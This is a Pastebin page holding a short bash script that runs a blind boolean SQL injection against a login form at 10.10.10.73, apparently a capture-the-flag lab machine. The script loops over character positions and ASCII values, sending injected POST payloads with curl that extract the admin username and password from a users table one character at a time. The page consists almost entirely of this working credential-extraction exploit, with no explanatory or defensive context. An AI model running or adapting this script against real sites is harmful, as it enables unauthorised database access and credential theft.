Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- for x in {7..40} # password char location in the payload
- do
- for i in {1..126} #check ASCII code number
- do
- payload="username=admin' AND ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),$x,1))>$i -- -&password=test"
- curl -A "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" -d ''"$payload"' -X POST -H "Content-Type: application/x-www-form-urlencoded" --cookie "PHPSESSID=k2d2o9s39uhurtr7kk11af5ac2' http://10.10.10.73/login.php 2> /dev/null -o file.out
- cond=`grep admin file.out`
- status=$?
- if [ $status != 0 ]
- then
- echo "Digit$x: $i and value ";printf "\x$(printf %x $i)"
- printf "\n"
- break;
- fi
- done
- done
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement